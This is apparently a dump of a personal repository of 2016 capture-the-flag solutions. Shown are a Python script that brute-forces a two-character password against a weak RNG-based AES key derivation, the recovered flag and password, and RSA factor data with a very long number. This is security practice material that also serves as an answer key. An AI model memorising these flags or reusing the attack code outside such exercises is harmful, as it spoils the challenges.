├── Google Ctf 2016
    └── Eastern Digital
    │   ├── README_orig.txt
    │   ├── Readme.md
    │   ├── break.py
    │   ├── decrypt_me.txt
    │   ├── eastern_digital
    │   └── flag.txt
├── Hack The Vote 16
    ├── The Best RSA
    │   ├── best_rsa.878a518bf7012add6d071f3b52562e8b102e72a0cc815aee7cb007cdc03c7714.txt
    │   ├── calcs.py
    │   ├── calcs.pyc
    │   ├── factor.py
    │   ├── factors.txt
    │   ├── pic.gif
    │   └── plain
    ├── Trumpervisor
    │   ├── README.md
    │   ├── Trumpervisor.bf38753e7bfc93d1bbf9aee6aa6dbdcd39d2ccd31f1547253a75209419f0828a.i64
    │   ├── Trumpervisor.bf38753e7bfc93d1bbf9aee6aa6dbdcd39d2ccd31f1547253a75209419f0828a.sys
    │   ├── a.out
    │   ├── flag.txt
    │   ├── pic1.png
    │   ├── pic2.png
    │   ├── pic3.png
    │   ├── pic4.png
    │   ├── pic5.png
    │   ├── trumpervisor.c
    │   └── trumpervisor.py
    └── Vermatrix Supreme
    │   ├── cryptor.py
    │   ├── orig.py
    │   └── solve.py
├── Hack.lu 16
    ├── cryptolocker
    │   ├── AESCipher.py
    │   ├── break.py
    │   ├── cryptolock.py
    │   └── flag.encrypted
    ├── cthulhusoft
    │   ├── cthulusoft_d68d9aa1817e5a43233efa11d6fda9be
    │   ├── cthulusoft_d68d9aa1817e5a43233efa11d6fda9be.i64
    │   └── last part calculation.txt
    └── dataonly
    │   ├── dataonly_24001a4e2a4cfb06392de6c887e8101b.tar
    │   ├── dataonly_release
    │       ├── cfi.asm
    │       ├── compile.sh
    │       ├── launch
    │       ├── launch.c
    │       ├── launch.i64
    │       ├── main.c
    │       ├── mallocs
    │       ├── public
    │       │   └── index.html
    │       ├── server
    │       └── server.c
    │   └── exploit.py
├── README.md
├── Secuinside 2016
    └── byhuman
    │   ├── README.md
    │   ├── bh
    │   └── exploit.py
├── TUMCTF 2016
    ├── l1br4ry
    │   ├── exploit.py
    │   ├── l1br4ry
    │   └── l1br4ry.i64
    └── lolcpp
    │   ├── lolcpp.py
    │   ├── vuln
    │   ├── vuln.cpp
    │   └── vuln.i64
└── WhiteHat 12
    └── Pwn2
        ├── exploit.py
        ├── expression
        └── expression.idb


/Google Ctf 2016/Eastern Digital/README_orig.txt:
--------------------------------------------------------------------------------
 1 | Eastern Digital
 2 | ---------------
 3 | 
 4 | Forget all those old insecure encryption tools you've used previously. Now
 5 | you can secure all your sensitive information with passwords using the
 6 | 
 7 | - PKCS5_PBKDF2_HMAC functions to keep your passwords secure against bruteforce, and,
 8 | - AES-128-CBC encryption to secure the contents of your data. That's 128 bits!
 9 | 
10 | 
11 | 
12 | 
13 | 


--------------------------------------------------------------------------------
/Google Ctf 2016/Eastern Digital/Readme.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dapollak/ctf/6e0fb1b96d3bab12057d34a11bc24d91a78b79a1/Google Ctf 2016/Eastern Digital/Readme.md


--------------------------------------------------------------------------------
/Google Ctf 2016/Eastern Digital/break.py:
--------------------------------------------------------------------------------
 1 | import pyelliptic
 2 | from Crypto.Cipher import AES
 3 | import base64
 4 | import itertools
 5 | 
 6 | RNG_STATE = 1
 7 | 
 8 | def seed_rng(seed, len):
 9 | 	global RNG_STATE
10 | 	RNG_STATE = 1
11 | 	i = 0
12 | 	while i < len:
13 | 		RNG_STATE ^= ord(seed[i])
14 | 		i += 1
15 | 
16 | 	return i
17 | 
18 | def random_byte():
19 | 	global RNG_STATE
20 | 	RNG_STATE = (RNG_STATE >> 1) | (((((RNG_STATE >> 4) ^ ((RNG_STATE >> 3) ^ (RNG_STATE >> 2) ^ RNG_STATE)) & 1) << 7) & 0xFF);
21 | 	return RNG_STATE
22 | 
23 | def derive_key(passwd, len):
24 | 	h = pyelliptic.pbkdf2(passwd, passwd, 31337, 16)[1]
25 | 	seed_rng(h, len)
26 | 	res = ''
27 | 	for i in xrange(16):
28 | 		res += chr(random_byte())
29 | 
30 | 	return res
31 | 
32 | def encrypt(key, plain):
33 | 	e = AES.new(key , AES.MODE_CBC, '\x00'*16)
34 | 	padd_len = (16 - (len(plain)%16))
35 | 	plain = plain + padd_len*chr(padd_len)
36 | 	return e.encrypt(plain)
37 | 
38 | def decrypt(key, cipher):
39 | 	d = AES.new(key , AES.MODE_CBC, '\x00'*16)
40 | 	plain_with_padding = d.decrypt(cipher)
41 | 	padd_char = ord(plain_with_padding[-1])
42 | 	plain = plain_with_padding[0:-padd_char]
43 | 	return plain
44 | 
45 | if __name__ == '__main__':
46 | 	CIPHER = base64.b64decode('Yh99elDYtDcUQQdZ6K2kCLc/MhXi7RcsxLq8FNDXNdfUqH7o6kkppI5eg9Ad2X4q')
47 | 	PASS_CHARS = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
48 | 	for p in itertools.product(PASS_CHARS, repeat=2):
49 | 		key = derive_key(''.join(p), 16)
50 | 		plain = decrypt(key, CIPHER)
51 | 		if plain[0:3] == 'CTF':
52 | 			print 'Success !'
53 | 			print 'Password -',p
54 | 			print 'Flag -',plain
55 | 


--------------------------------------------------------------------------------
/Google Ctf 2016/Eastern Digital/decrypt_me.txt:
--------------------------------------------------------------------------------
1 | Yh99elDYtDcUQQdZ6K2kCLc/MhXi7RcsxLq8FNDXNdfUqH7o6kkppI5eg9Ad2X4q
2 | 


--------------------------------------------------------------------------------
/Google Ctf 2016/Eastern Digital/eastern_digital:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dapollak/ctf/6e0fb1b96d3bab12057d34a11bc24d91a78b79a1/Google Ctf 2016/Eastern Digital/eastern_digital


--------------------------------------------------------------------------------
/Google Ctf 2016/Eastern Digital/flag.txt:
--------------------------------------------------------------------------------
1 | CTF{The_eastern_world_it_is_exploding}
2 | password: Yg


--------------------------------------------------------------------------------
/Hack The Vote 16/The Best RSA/calcs.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dapollak/ctf/6e0fb1b96d3bab12057d34a11bc24d91a78b79a1/Hack The Vote 16/The Best RSA/calcs.pyc


--------------------------------------------------------------------------------
/Hack The Vote 16/The Best RSA/factors.txt:
--------------------------------------------------------------------------------
 1 | 3 - 1545
 2 | 5 - 1650
 3 | 7 - 1581
 4 | 11 - 1588
 5 | 13 - 1595
 6 | 17 - 1596
 7 | 19 - 1553
 8 | 23 - 1579
 9 | 29 - 1549
10 | 31 - 1613
11 | 37 - 1594
12 | 41 - 1524
13 | 43 - 1538
14 | 47 - 1571
15 | 53 - 1635
16 | 59 - 1556
17 | 61 - 1605
18 | 67 - 1606
19 | 71 - 1589
20 | 73 - 1571
21 | 79 - 1548
22 | 83 - 1630
23 | 89 - 1535
24 | 97 - 1456
25 | 101 - 1514
26 | 103 - 1583
27 | 107 - 1591
28 | 109 - 1529
29 | 113 - 1601
30 | 127 - 1565
31 | 131 - 1540
32 | 137 - 1547
33 | 139 - 1638
34 | 149 - 1572
35 | 151 - 1549
36 | 157 - 1600
37 | 163 - 1589
38 | 167 - 1578
39 | 173 - 1617
40 | 179 - 1556
41 | 181 - 1582
42 | 191 - 1564
43 | 193 - 1549
44 | 197 - 1520
45 | 199 - 1574
46 | 211 - 1544
47 | 223 - 1610
48 | 227 - 1600
49 | 229 - 1610
50 | 233 - 1564
51 | 239 - 1556
52 | 241 - 1564
53 | 251 - 1493


--------------------------------------------------------------------------------
/Hack The Vote 16/The Best RSA/pic.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dapollak/ctf/6e0fb1b96d3bab12057d34a11bc24d91a78b79a1/Hack The Vote 16/The Best RSA/pic.gif


--------------------------------------------------------------------------------
/Hack The Vote 16/The Best RSA/plain:
--------------------------------------------------------------------------------
1 | 63353046763311336540475368915365847611488681631511977314745668132622795773520797887100515548697500148546599884806756052678296240284614348287487627888533964249562783004980084718140225396027387174367889467023695205677972645346861136348345370287718890846535464236476533952845131744925329455194594839778738287593729525432259128747878054180941133786219263545656438369748827041314474210271459066475927459970173199887833976995683769230156218112047819175799815876029384477462264153043767388067022995056771157999953578018020159435465720128164761852267821809895421512526188252389044331707660892005317599845770060966979521879171798054661050986433837651377613304336928818484813434147480982749624978555652501863453141452694316499528717935496095983017477484236510731997684875165852630886483286000323362649900005606459777076622955014294421511380060940197982057069790727441914911330344732678415660792758644725969379585879527714395268271385747765472115466955907255280896615824894620683992306203859414470813779983790401588036752553701860179178357872587747301630236260857902068608656511338599156069705338060218056006680982399330147887633906113226520394931232669763522512159614965149511614097108426127253296857988983298684584168228908825608884650121507015548913371511532724379114175525969825033560400726801097827125474541804072516958635570306374090901686280822877512185838747770767894164131278086868404163523976787971615961508208772806586195363341051260052211440997985293467218968397604358825422874379657942331506271846352868566315907481999358667351255502863461272074310652709822591294240126152100266026288022734130536614961063553106234252389851870247706105327350922687209853752503160164156159246780811276451709715063350515599734573312542783000498396414851436805796232563751502748941355227922037356936168049270869082761824990513854693532341464848658470890037693424436554783941660346044560050432978045124812637115408878658779593460732175706174141274727727641179985027188184032350185661452911838686063943437176281096831087006388370282856019465833851067565156270884811938850278832088774650464879259531420294905742069925379028411601775570645117081575135797298770444516446024207495162732837094292882630389287362670111028164465083990730794544683813923311845999530869211471696454636844563457002857765885679996428717956564442216877723871009885711116503007993353421398395972106698261229790119708560472165714707745417875463924055998542889784762153206983225644843628181699075665571675682677747617844463472011198168842328724321546273744190803263382793410529296179843660242387233197866283468334327954262973386892482442941033453756440379603590065727663863459587273898922193870661311622882968952262649462217391169652523888670574913976137846011239697825861992270774559852931990474346045396044774315084133127384189187893679839296042659966650443093001303823375969100558268207465772628672832607006928628699629712680431712110960722440633486175409429811823322611839124676754837166506503334301291292097328649097736296405254927774909301496700552638218055844674395630231568754744245504014760392813633822384101178682856800609637673617929028845403290163987341635889398556725988940428519125519086375069913111573991533509127404391885347260811196323214115631684597665095641560561188457908170006819050241081340546811890576542737394389797906746811494966093694756188416412705455997930576588534150752567033329426074976200257678729865937506252995242968725951041269074335179871966112677030005462267143418231491450843170639417148253187496398233180498741992815895094003597672450716476922331967887458812809548778774255101355542183339991791275081454129122615277537091819525360536027730964142831511008776280515829732973539781601886793682833209907645061276631005520960557786620585407002251144878267711109719475051970301590488984909519789799150577723020946538977431241353326108035125245740339033614728985573304773226162444620667725328550660532806135460807518934898717434178723998061832464737092111801724285844860487087230631382668455515762329955955797295255825339676792365787318449911330478807644643610154114693607370937035523132398279387670968384440319722109572764183184748401393652797011997307727824746139297544020181748725371471964184784118896238653950427836688027306245979961558302864051667395825355763437571711354792747292739633946279582270122312357387969209691441215008532191781261102746592929523989827726991319080855597302454925449800509277208538582055067085486603223395288018483100422552657438186327723126924367141916895572193677996001311589651397383543847399862472026273711570709843211464317349331749377797321009107830769304724766196560020710801449492964220148919757160837333429795888293627053624078296032978358919578866265947662662275311915621642099826623670648499476975958284356394381461852038859547846826576069941495227183152304281329562359865076705300563407811057641222506960495941435369096476505734232757808553947259306156824498452164111905347370726443852074674090975689517405497720402271734199786461800963481012862666712327099358692392381103451032214763355977667965673311081154775999946816749164639447988060612917104344044024732580442161538206137872403419205848806387314743333770208948338376492038976006261614397775846653523751432962415159840598151124754777171285420259960364017323962124853623184009451010661629249112571257352593499740088099621671864927962768386545972670358860043014099591251632586757287366941563218528393153437031865289215544243830816790356323784790186793323776687991561731599827387437244671310825844236185301997038475267355823431664417460413960861590999832259699911870762554519253583040465935806809213981066247140671208118993156136935064123054843877079754970781561228937079652921071886955026514855111184559550447746473701430107507126567967614494851662044124088279183558692351130661842752486746002328667158596869017196128790622062771395301543792557828387164863697967168515138691879269894088650185215062145341874260715979526784066913266062688865683071699283649494224747078671226684705856198716122401966392466996004269991614563145924657133765679185499908605029366345043657319721748572139545633785847772514306616759401382233414079237817232392666403303489095775162908020939045094555349972883871579112461593729765088109706278380297220775691693878937903760584916957888876632947151235488333108111275081453569342692510848416748036615472865515311123638903822475866233606816558688686797048090560586338106520744377524686873049558589356436485957150669104108048507548578968419819121925123515030231861841343815031027813491817115570207980509965488540609105633354463546575084206622687101165348184454197000499957132684305354696660385908799215485316375111116244122654846535954576379111265138760358824085537631343073100906697790395228745894279167095843318928670294531639298186600893191713000358833734284986159998463611718548587895742422409232741539451581287999929008307550907260632578863546636988141746431979473188096105316777607816675372337480454251570220814970962057866962042884377465293869795186447162098553196653373678728899454786297783153299234317520542085946819286095800296054919350732488596052469075941735970389400146840062094627045743886060564922965829823158159202394931451118345656576883136849632978261982386061749895156657050508747438405018454330577542596530355113899331447322989825428574632887774984706079990602183857832020828643829032380661652527198711813023174604879839668907149966294605065602413183746656753950420572774413859167596468467498916197713537517908503817198747785025462720953367771832868256686486103004920847309301373327093105106746316678984817009754721955116611541868192552392163442006230946609154008947995494559564855177466805543402056396200969741748435365515656933698712249881363955387163106599383050422652654856877018267792305745729877908810073077112909442218943926785763150715791487872248744017020709887533157066612133250391007158411972760105005203528570459287024562946720274471910312969393455775629592636522814947104572544860326419529577297107439291948164843184198539069197097720712655338788315210676626980496932035367717000120286163734231681415076681196326308064032387566161856207809194890898915444198535864907331016302426146039827183396535799877790412479165585293177072141970075829857153844963814901011468496321419362919206515446431726761902973013265290357522819308709687855208706867948480922298688467466767690299392334247986944525270075990869550173271029478237936298923473523844484518378362167971818152406906923261609238888918944347415101015417027884969112209972097267947901191633066896538303843384071360950208829222290994105826215948434845983793170722020735601747352771729830960842434910280144395074784158985720285593334609808360132671286603181656890243172853939540975933514117044150995319296282657845070321877731637945178161962964651485269364900412891413868578580346201277671439439643154113028622866067215003106313482530666032126088917025538891518360112607710737168246397168370476525729285381490400233827768911951287738313139994999091609853396631710668856253222245188003681283050671621280186955562668634706855531612071242562350866333217632365830023776126734382605574541044712937603235920498926051748523926310602921190018883728915679180062057452482386209993713339614421443736358601740394494834469819717799755787569898214395364396524379104503640531389546709604383691257760708667896074430168104476964812787310429225811590300689342367956419711804478425275169071989197484274822988057037934131764727329961689452509923390882959383680749643818680598026339787673654392629159791115307427761199568029455388893726036951784351676403141146970307147686805926848142652037403895211478717289584955153434987853444099613062493119274228967418088566488024918850108237451748008968349498830978601210848756224778905032556800380163944629889589238334129138699621460084782126721768677730680421484735569943578850392744196992896135202636425699604327711558196832453813363912499267674693659159233776835500992326893817387946860493201432931669152550923824510661697615521947224044228926612169688731584228692032821046966852925667302178025172252355269212342994707151160692987698540166220725590332081493510724092101602396035896007631187130564564713593039770867311847213822055007584794022873657890654791333565851686155100166564499588237803363136393622128489800535357426175932474772817029834493632082456209027470960683691033713088162599726055027068233519813229858021409722965305926051572089827590348910775826486308445811661522200368776165250639783880870306341274719401340617826939696173525821260470882706746865652474551084774538411908673189361957735815629082854695854814633378451723894597487464307015462258275529705838116832153372468048144276285239240544886260231409071203541388975146520174925665846010595864585325497763112924430063302490949451455623257506563596123887498922528653958748262881337343577398485354927177937634908764350313699848599546525728167655072202912344822950311326362867026876924468433365465596423327987586536006665834854070875687238521136632604160812305998367498607729811030680254653301398124251590620082387652178579932122688691157151433519428556190993422464389583525595512317198141709288652437719841494925146223830407045747975099675882932110454093386804089560155520826256766589768141635543967829605850637418231757523702008907325987608528332275554397365897044509869835464828870566316405922849438671662896431165282058959683442530432221071545761466550987511250140504646108925591238857327490023441367843353285720673022518838491503118329450067575653405922268467386004463889156332222169471239303143793042540557328386843144987612916503194775209734932744852523641207730691488796607865694005113473455036842973029364146798227965234750970178856502487909820273025080716338289178612825296217792303698901122761407538255806465796280333263728822506334732048614170252637506637648799807131066464498100550389019789368956066862500359009839594167895482137618944647930671388827866132135569925152140465069937674919003277231639551592615319102182521721006846230193515717230061715914714865579258177019912699928552759455777380790024727176865138713974042702014674556303807696284842343306607070718113061605274147450802722698092753983463583949726342527447817747188721539259240990600555047946933660725798172427743872588147352636424946196532759023077228182115349560951367317785649805699462471339163634489390976675088195484335154789840996133471589452143338991445593802120212783123148585819408443035528527711214821709878679069944633111739162617687915235258475525493744573314910030700402720352787840882432194098004759376117548405428814873674012031496252208817559237276265775366252794420737878520788543156962252236146932410705633299710718173931762049306622012160041559419902471599458512187074683304577015085565040086210815533252640630139045335950697841465462850186226414153208560780994431385298339405630877696862358223065977023690649031736519298543095614383814863069818986339772124281838647569225697442141459722866671617351616033463639650270372156552000883257349895605661325907359710728811123625807012729139345916480749818183774733045417120378028696052084945091526347341956706550245249240622631363339886552377182329592578719208404402743366977382235616989229691360747432873505451953313673998244619476861614701177088480749441538949617446025706951917000449084528686342175294054909092411503709398399806850895538312871828239432344228321188462183993322007228113039435804405562257212108975963084470208108393527639905337896908344931424028957171047561993776964904138185115081056296451650665248354966098665331034318462656504289921875164263920801815794495255923777277468994141805130086609855804673214339185671415959458702734187112026219070225029339653637151041800988377406498559214839331778071300552262262692288325795134771016176491682421475713558974369494353006325997942244426360114370504904316073288768451939179812713437138494701518537934985709501852351886532743098600326491978335464293584158825788118121247431509130366979842869442313091187421035597476739411470365855594904736975921649063296917636300259705544183742642013982462072521937010174734341545268799620725747790274928204457025601586312452000295265234808311956978186287160697172790819858422381535581052784483932154907476473048423953275990636044192803248338447621672548394939496565012649400518910850561253823921772600109020574980372122357281208778994838109932337765359615153845861380041509111514351453739101895892641707892274580579461454612482408385440400944407237648931714919924421826501801879036537318420217407992457526189320718931204369604794325465825038247720059290776474462371268099319061457615977622951559397490769860082466871016704984460040869092571283653160714998801559994047422529430530592581688787280275396937688410465412674080197217108323767300351938177776331710879213711686560352864349810739443641714464999447960553919746484417451512562678697119499387079898296470883297853898322044169657576685638432317659544348182631538916670930472652913395340342338611930984706305073713185779620611364797649102124559611018193069495764956262174365430675630034553200299630018564240431054728206733912739940433717213731204207740862818376569281308840242839581152217218940365241496676824687383096532529103052185568293108525275580296670439283318791579024164703975869256889785488387674560307157565025424669112691922237014086653900932104344506258427911928139274163954451576315045622073887414357757590539477036936503617207619684792325497628538661943317264159415908390957867068331979385297639604446199527688186214540195453373242799691497747923888241697270284521603336870447546096970853200254435671194368023353287021676674240245624829536276362280172185644251788777518593647744266595063791042052128342828288957757487510635633492413885833752413660274867698876927875638295878154498076385758951524073895564395583608081326854294300575799148860242826478812428128575207021119414926575926541230271799249641018776064549628446996157667430380396954672791157971176116920527601966415588242172607654983465317769786941083887377005522404536432256865593499307489606104470659881514463572868363889962558743069421011369777968250621574879554312584380085697598222345964221657989733855143617019936431382808619259318393349298823915682228066963150260259145403596667394542004130318143885528458632766539239891209070089831046756561011247880782717605218907145985722147408067396455512251043158877600427720119567979438127379455787121176783930724019818371221898084548883034805888612052080658527501267807016287295241943748253732567501957194595814231065113855303588197521339695021539184117118393209844254920011091603220695897443415278106345643986792736774751012877146525262197108501481407739875657722800281088635085846821884040219280143377854161973754519763923895695786957895311877170052571229075628793998546057962290294259860345095764088813917530574747174454250632013904942182934032292698713358762195663744704926129850672217567525073301699657456877699310203893798793566214451758357435994817591625702812313397436710050451995666017254780782091245068745866755618040710004029275210252846589927677061597566013711959206889106360689710161669040432855924133455373220687413207374346194224000831132868162570319339631720353322792419393621567286739239629484769464297369885462526713771636993928016125036968195511079261576960700688713179723309406369831466230069972891704478036782916140373874464906947874299678482421622487347764198987637144948910326538962847298514408336232884688152664224396489227170701530848328450981199236434927686792097732826122159713294636412382043776734911863732732646854319691271729014961160323106003006009082644425359599554060700984133696382420316544276028427980580714401011700343086462351587160770274153621157550005750612438988621970577799739838881186068148353804595116209670079534956853732718702595801747454948903710709480080295410058277056295481179022440566537733815220696645108226012491453418876350712347505845836926245450603489128846385808847388727665536819651108873918575213211196197880000090753147070888829313842982375775214853556081724047775248686489859515882575879738109993213259565541573450023225158682707173331546854986222515944778290421872660901863585089212599676952738609208242471105889535509982267998360202544472437536641102731435437171792727035828321547712643782868477601574862554556871114732052000828461846022646684491751268070925887170609982376348857889170955423598157976397470344180091736060714952768138454809622772532430856937443098167836289949005060305216825741127403424549534294154288884794557735365460605641336887427474943593624941779510769833472939486812607930584178340524750146246085671739779995336488479919771400534195222246406768390875665567974900412587976948322516398333138598820081449995312105649750490786826852406225026254521621382395372089641938952304337566896398134468713617453040500422021006442952677932673992984709796341194147807066406878050710684416233619172070555871407174142286110219149675427135274054771113131298059838541938464244793634901388037179902851463233456483423936293260208817959254287312364620366325660997933511556572663496368274072331425382774988984035489817507263857416713174779808996868514758786855041864447618671131610939076762156552462297516809077873671471374216048218119738208674366758310427476679994895500776179934936214870272468036584973239315754647738541121078848486805896900541674177093184309043808645131945996401938856313854892241471437686804792487503822917121183254045603396182091909065022823963800700696469525567989694714351107427639821480065403816650866148433236536897583370332500239116444942276866069300290583716023931823411408456981524683908896870296583686704201653403353000626533342228902047597069879058539822041304694875115162113799007392527918527092713353134516514127892811218784833795836450123188918891919427669614939385182989902867708665700993658004840137684097124737862299798154860486968559467784807206364597820679776794236342945700778714281961938265200074223986689720658817269893018160041886185918686725426134906970707481522399133529447984295075340258729083437341622198971504876334669028118571630813057032921057754401443698457874402428669844121316910392352536057903483643133033458477257980493354598513477043145171593237151847926180231297703810470964647982359693030374162952137152321626011454466206783036211516607301499596730632983309674599220278853358324640808692721707394106743346938327773232687922789684346851576176373277215799593771069058167817827142608551827601200118160707119211345282794296160396116729784040510785815177123281939342672199510147236160403192461579584687478560370446710791673448859715094906458750292383563072138454794878007046009167402006258182321854487799548808318561642365848768298329178300998725660009521554630738055968604514882232166545408750283939191620516496587059428636149168789444346357951466575702269697239432638266422268605892210316427166132233384517172911998709060454546116432843651743707128400579413129818383944139924287785401714529884606922694788879035663093057364579963032231831496497862861918611473467062643105240379004384131553407060785623781550969841726317967060223802239939010760252247311557934784909719050847534641267945197973311649200262009763501761676399878538316959860485035785026647353936394247747539399967488722791586998989593151969627359939995294415140654675977881495766222347377705162845929435800882994130583376685022832770150698804142875840789570863188216672913395764696854904894225932289579455450077491426526762856167544838751459739771592015078127777787136204982806496069142742085276641320929838546891243866904584192302798497972230278497980369676695754783677115870915531861593053366962960831258644741005284794538690457026017408634018101393701267393757916209842544968211546612131991974441929788655144259974393986250838657426053305153111018390769483015344200060265118266604430983785344921312266029538992370099903749804266525927702435090561694476221990723124712020241233670716421282627731039753186908073370419822580088533088950679981061735916144190375571052631015991467495547533701023525104288344966008071142686642064622986529763342050549172575257396452968497106947392409396322541152575080338173732709806397713169879701209896621534554339411094370107267763052399167703005652734457486907986128587147841144556794065096830409014595367100506417677210478147464305956064057576354641506884369349788653388846265228650868989973881717003499898120065298589970618514291732413745814962654965278981011459405281481126682096267453292417806525717587463824384551733071677783177148469505961042849415914087599070170455815094609514380457910626384147295358162530647737756822122819141831945521270732933929492652448840681801649824101037867196897980322813501464102122179637495514649370984687033089082645361663535122542496343815221727486706775153256988128124092236320600330241925321988361802674964922523256148974547347878784816853559446339730759320200375231597160264603523674400091906940987694886309830891182322078842178281061051275871004638585626080858497733131270490762033305661173925807655682984129688360555703531890058487584507636819735568864559544384635420901863258503516940740700222523023087459271231802576133864777356119744056789195994318307313710700445767197481415299533449519776781001154241937808679466843774115001263878285885517934834787216006155476898358203003678598556453888015858171792569880785126471071513790658655275823656341709450414057827705054515068262991947320116131856491808034623811020169721620445397150630286154764977576609317948665842077354927101735678170015518287613656509076146735104375398521395427982584532912810029740776638041824743312157497493339444752530640094716825760456155348035599165412223765445653371842219718340023594334197908055549776090591586688829121608851023681548074306076575934789211816818123238300310826290510193876288292106872814183742422162773360624324701911389667330969149680586633472393600328924084472986810599459361898259333504524231576291628047603659664451512035095724106024968302860563963769543258683850991311475194703905717776365956477175148165460091614652390864551907795964505189726841400888434546215609030597209402877499486884446093312350483378221286162070768154976929976048194706857482414767695641162849148944259197070819270055564886499070741438175980925982132120538972108715789550812643084165690789603556979414695090949845820827719623488221678664964701491866551431804006259036325366465439840772374149127395783614069649678771537623332540857845012455034359986606180464520988131760445757201987643989048301975463333233417455924453155804593528455664100561081987364291677997849105746136887263366217965918023880074877219264816870060713600857553270639395139855957542320701576406621670079921151216599681290379802773487209559855726793082533374038312775975321587662444519889618429903159856953192289781951280393202297399645342687423673937154026947148229700551534703276379859974979770129814627879846822394818226087122094326003516565211614243215275631171697894566821123271629813140593274180491680671360206640887645958777184753949097433198795833688853770045388445044413973687613578688805756257797317891876842990141028439718345634114048561983785251337660037338289615229969875916172688480773660000638088919526818999775468598716403343221339500435878311894270268373462166416326042853787629256279664944518828589635552058276358772268302092007817346546823075147145619266173119158554502388332973372288885335164012457934223691864375503099984544625626891088717281303707660371793603893711194738536597940498932264169518895153298744725275794504739370481749939411605394011725146481079553528113623431205519001603407975941417744507709738444994582258656746877587189844612028505287767006571849290562907421479849955417487953309145960832333641434686806919621974820598811125018316865909723753680111318714629375897723443239316310630043939232649163532447627941018239204412358361025886155431097439873544153848833795702084462100074976218408154618918368597026662610022702416550057514525019380496661926906354254905886832583541507586132711574755336213092469118593840418114437976829035215907336596542510420136628740021778752649536124059750453110527812269372894090876319351709149019873023775339778627531987620415890049625818666516005294682228153407886967070603741635022489232109198509583821472549962519487887546718795198640061502409660915835117607150355361918752451974171192018497909033248085964242855395006191957214274407330385667145098864978538014111076558787076736837799085987558742699237388558179019841537691989125479377233810912015000496895114463159097314394419950476560969618748825638603246236196035024474485041428760586215627154615241568838970224647877561315309471087691413918404895809556468957849671883823596920940492101335139753366916483865442764400163000014151791293773548761936771840820121562814554209530296038521561015980900847707691183714958906115405056831879488140286068179774690841627559097506357656760845663662564712261544855073366977862992813418042024024252184475534459397879412028912053458207841242722663516494991292900111530050822569066317387589830359623251235431157972088395499648781974207480815640772225852847401770291284354415984444811244855687621601995295723459941017837150728462073599745736829361062706337100583564068648923041614767754513636928328402821432398037032871780941863205960045884726078843942586306653820489257738664530882901639232274191770370475008147675257787073426130946002861832434693279236908111199560814335392656794125153381802681860835067659883205322812068855761680878133591804461990486810203771685348507461901518326814243154054704556856581770861233334649180362619008991944113883244694122960453190362771353891291930008887349133096951654937618464150686590869809268559732005167207137274084824239940647204383569838766603744061965081404262696594855272844080929729873414184658270075063949971623709348928524916640214342448729485504148776925269426146294139005068326053602950833149592022516486241634298118774399022345288340578773966265437104582134407611649925459091932503060297930650393367560367279284840908155219871076161834177047855233681767961385868494273730104110451617974229512060909777128267192717044381667166045064675064553736048661124424783591261546155200606186886122796434715869382188065087963121121957205229637510069558385899638721372125597015909906058329677878158630199280239700520617552119752388333224494433746661527282600062167976101355463024589628424180445745851612435605852387313538809918496467333864043189735978828698377480088708600795533209443632516845558515048732540933902251530701511762556348891102938492050803554973932236807405694367134156145681561712243080400435136989477347315858240206070320680028287177422350669542253985549054838276603303528413013983724864777093640725527764266616911188917297980273173783352079132255365549403604543483223467287885589956847969464534447074038143328644583591158311476536002653359288904233945868185399155021372688839664448553451580618309578833601686275233246454741221686975598120682712464069466771260132454927525442309073999257989372279807120460650291429164039849635976622789924430137717186974504991995927211051654088282063603427660804440606582391958527514922526325951363848071266765752994433936090651659775904280658355017107881908367289964515570597559072997758050260451486378831075893901607133431564579755577381531173770359931261860368793094454329915127873674979559757844967600043386190646316108099897845811834917243584875654200305125581984193515216005577631334366104342035230670817343961928579064463291420807070239593475343088338905135422457819957037102756316176959731619009197989052736236194386387370062867710629160187179808649259996884986839372107602526453221077883349857730472703564344143519297132090902758180478356779218917761338309759054923410698222093657992665670302431620956496636443758582925057820715923077526109875689767387850198939881057692249820601402278376462718067856374092961363486596214135010561444827134068415174874930935982508345394151029192947196401932522152485317454947837974160535621100774670383341981449517270131462391013240999590230656157088602896938756097553156804989949998881170199045214167477309903687259266944359061350302620253725921265891184888789000268911945488132171543796214604332022580572907712662703433997781312651742279935176011058297511266125817712422364400058664216351280184400415174260095848485451828664946056664831467437963415721300469465356518736350085639851267254942355908224839359363174521833172015722832009174217863746387006129072246029617287434042150029967140139458755932933902461471466540164133127136025973641429115386768923338864894361554495598431518515378971962295588568934421775296558819483433190326650155470260795637730611915027307420714172395603718709574028409569033426861192494754028384919056242714623678960018348389799354744184034838005768376467290931653125251168562723232242965855849944864622080664787525581452321592315412985302624909699692414251785379481914849377970231922993522047132748918940993252185171690132356479055343926372443206158280521752658856442024793734509092641983026300493570042054559160791759702734171622025073978872773670507276008279284628548136162748010665779942645437262766800723308814474255597142015789387307390329969930729414719413612981883126769693481563943415953920271426356707523171864397200025570209561269179192330671485814299432460824186669005267487590456138855064873051182099355071570769564630335931608802499947314994544623014720364164494766323924958902249125492150534374023490986627659222220414646302771797339532102690593069332983222671053076543004459188195664921671083221260546008452922813470991729996052004587901854438761870557384622543436499692157293454855838159211996679865003000266549231914009489574368418078599714172122240429719559756238728998443091187161663119793271498062267741639748618831475113284309140094712411168091250049252076056686590591444219925077224689677713234550990433533221854059756330611718307643086907654573820817544029890509290488949996811786808096907854940413082010999942323153512960774579903661306021970912328857720274476590540128581247753488821193968361131718990714239677394317496241124823253864151192084276574761408823386243242058976504411389190153171874164785082015341597831394067524391642701263287827959453419945009069011770971135440769197211180886635085680992127158532018657603797754404771359025687923955146677470012969068187286724335485795539390429377573199071039514458669923000752068135042521102778645856558289544254629775807727773398615483279258082086277757343675593286174943925193807887217475941538674992620249398383470283321347801424439726815022519842308691448862617145278162216663378840368306870240288237120489477765359603214669295004097892046816863243550834752715345492562077486684109775205457790176033057719229391952886738681882469917066949879264207477288273944696619076390325994161888192647497128547175856427454947917869581128559454220182590378196395760197428985931567125573959866227127845060505386070635737979324446381723059654139239069613697419331746453650470465882861287374756462805624146396634799332756122106878188016968732092409346624548176227296020811797587571264241748786684494268805255059833665211479741108598837649960982992546568224143001889715605225094333789537038478986784110681021074075179635174465115483913160127686825724826855016957668370004180817455618856042216029754906595893950431871806871704673535836448524740231271140903461798461091993549734105794104768285093386857277370884155363550595931324393731034487929311076228119886149868049118804883235595994737851704119926489106330393070443025875542